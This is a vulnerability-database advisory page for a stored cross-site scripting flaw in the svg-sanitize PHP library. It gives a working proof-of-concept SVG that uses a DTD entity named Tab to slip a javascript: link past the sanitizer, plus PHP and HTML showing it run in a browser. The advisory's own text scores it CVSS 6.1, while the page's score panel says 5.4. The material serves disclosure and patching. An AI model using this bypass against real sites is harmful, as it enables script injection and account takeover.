Skip to main content

CVE-2026-107380: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in darylldoyle svg-sanitizer

0
Medium
Published: 10/08/2026 (10/08/2026, 19:41:15 UTC)
Source: CVE Database V5
Vendor/Project: darylldoyle
Product: svg-sanitizer

Description

## Summary A crafted SVG bypasses `enshrined/svg-sanitize`'s href validation and delivers a `javascript:` URL through the sanitizer unchanged. The bypass exploits a semantic mismatch between XML entity resolution (used during sanitization) and HTML5 Named Character Reference resolution (used by the browser when the SVG is rendered inline). **This is a logic bug in svg-sanitize. It does NOT depend on any PHP ext/dom bug — it works on any PHP version.** **Affected installations:** - **enshrined/svg-sanitize:** 45.2M Packagist downloads, 1.3M/month, 90+ dependents - **WordPress Safe SVG plugin:** 1M+ active installs (inline SVG rendering via themes) - **TYPO3, Drupal** and 90+ other Packagist dependents ## Vulnerability Details ### Mechanism 1. Attacker defines a DTD entity whose name collides with an HTML5 Named Character Reference: ```xml <!ENTITY Tab "#"> ``` In XML, `&Tab;` expands to the literal string `"#"` (from the DTD definition). In HTML5, `&Tab;` is a Named Character Reference that resolves to U+0009 (TAB character). 2. The SVG uses this entity in an href: ```xml <a href="&Tab;javascript:alert(document.domain)"> ``` 3. **During sanitization** (XML context): `&Tab;` → `"#"` → the sanitizer sees `href="#javascript:alert(document.domain)"` → starts with `#` → `isHrefSafeValue()` returns **TRUE** → passes through. 4. **Sanitizer output:** `saveXML()` outputs the entity reference `&Tab;` (not the expanded value), and strips the DOCTYPE declaration. 5. **In the browser** (HTML5 context): Without the DOCTYPE, `&Tab;` is resolved as the HTML5 Named Character Reference → U+0009 (TAB). The URL parser strips leading whitespace → `javascript:alert(document.domain)` **executes**. ### Root Cause (Sanitizer.php) ```php // isHrefSafeValue() — evaluates EXPANDED value (after XML entity resolution) protected function isHrefSafeValue($value) { if ('#' === substr($value, 0, 1)) { return true; // Fragment identifier — "safe" } // ... } // But saveXML() preserves the entity REFERENCE, not the expanded value // And the DOCTYPE (which defines the entity) is stripped from output // → semantic mismatch between validation and output contexts ``` ## Proof of Concept ### Malicious SVG (xss.svg) ```xml <!DOCTYPE svg [<!ENTITY Tab "#">]> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 120"> <a href="&Tab;javascript:alert(document.domain)"> <rect width="400" height="120" fill="#c00" rx="12"/> <text x="200" y="65" fill="white" font-size="20" text-anchor="middle">CLICK ME</text> </a> </svg> ``` ### Sanitizer processing ```php <?php require_once 'vendor/autoload.php'; $svg = file_get_contents('xss.svg'); $sanitizer = new \enshrined\svgSanitize\Sanitizer(); $clean = $sanitizer->sanitize($svg); echo $clean; ``` **Output:** ```xml <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 120"> <a href="&Tab;javascript:alert(document.domain)"> <rect width="400" height="120" fill="#c00" rx="12"/> <text x="200" y="65" fill="white" font-size="20" text-anchor="middle">CLICK ME</text> </a> </svg> ``` The `javascript:` href passes through the sanitizer. The DOCTYPE is stripped, but the `&Tab;` entity reference is preserved. ### Browser exploitation Embed the sanitized SVG inline in HTML: ```html <div class="svg-container"> <!-- sanitized SVG output inserted here --> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 120"> <a href="&Tab;javascript:alert(document.domain)"> <rect width="400" height="120" fill="#c00" rx="12"/> <text x="200" y="65" fill="white" font-size="20" text-anchor="middle">CLICK ME</text> </a> </svg> </div> ``` **Clicking the red rectangle executes `alert(document.domain)`.** **Confirmed:** Chrome 148. PoC file: `XSS_CONFIRMED_POC.html` ### Exploitable Named Character References Any HTML5 Named Character Reference that expands to a URL-parser-ignored character: - `&Tab;` → U+0009 (Horizontal Tab) - `&NewLine;` → U+000A (Line Feed) These are stripped by the URL parser's scheme extraction, allowing `javascript:` to be the effective scheme. ## Impact ### Stored XSS - Attacker uploads SVG as Author (WordPress) or via any svg-sanitize-protected upload endpoint - SVG passes sanitization — sanitizer reports no issues - When SVG is rendered inline in HTML page, clicking the link executes JavaScript in the page's origin - **Account takeover:** `document.cookie`, `fetch('/wp-admin/...')`, session hijacking ### Context requirement The sanitized SVG must be embedded **inline in HTML** (not as `<img src="file.svg">`). Common scenarios: - WordPress themes that `echo file_get_contents($svg_path)` for inline SVG rendering - WordPress block editor SVG preview - Any web application rendering svg-sanitize output directly in HTML Standalone `<img src="...svg">` is NOT affected (browser uses XML parser, `&Tab;` without DOCTYPE = XML parse error). ## CVSS **CVSS 3.1: 6.1 (Medium)** — stored XSS, requires

CVSS v3.1

Score 5.4medium

Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Affected software

darylldoyle

svg-sanitizer

Affected versions
<1.0.0
Packagistmore threats →ai
darylldoyle/svg-sanitizer
pkg:composer/darylldoyle/svg-sanitizer
Affected versions
<1.0.0

Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 10/08/2026, 18:33:32 UTC

Technical Analysis

The svg-sanitizer PHP library versions before 1.0.0 contain an XSS vulnerability due to improper neutralization of input during web page generation (CWE-79). Specifically, the isHrefSafeValue() function validates SVG href attributes after XML DTD entity expansion, but saveXML() serializes the original entity reference after removing the DTD declaration. This allows a crafted entity (e.g., Tab) to appear safe during sanitization but later be resolved by HTML5 Named Character Reference parsing into whitespace, which can expose a javascript: URL. When such sanitized SVG content is embedded inline in an application, a user activating the link can trigger script execution in the context of the embedding page. This issue is resolved in version 1.0.0 of svg-sanitizer.

Potential Impact

An attacker can craft SVG content that bypasses the sanitizer's href validation and inject a javascript: URL that executes script in the embedding page's origin when the user activates the link. This can lead to cross-site scripting attacks, potentially compromising user data or session integrity. The CVSS 3.1 base score is 5.4 (medium severity), reflecting network attack vector, low attack complexity, required privileges and user interaction, and partial confidentiality and integrity impact without availability impact.

Mitigation Recommendations

Upgrade to svg-sanitizer version 1.0.0 or later, where this vulnerability is fixed. No other mitigation is required as the fix addresses the root cause in the library's href validation and serialization logic.

Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Data Version
5.2
Assigner Short Name
GitHub_M
Date Reserved
2026-10-07T21:07:54.988Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 6ac7df822cdf04f6562e1735

Added to database: 10/08/2026, 18:22:58 UTC

Last enriched: 10/08/2026, 18:33:32 UTC

Last updated: 10/08/2026, 21:45:50 UTC

Views: 10

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses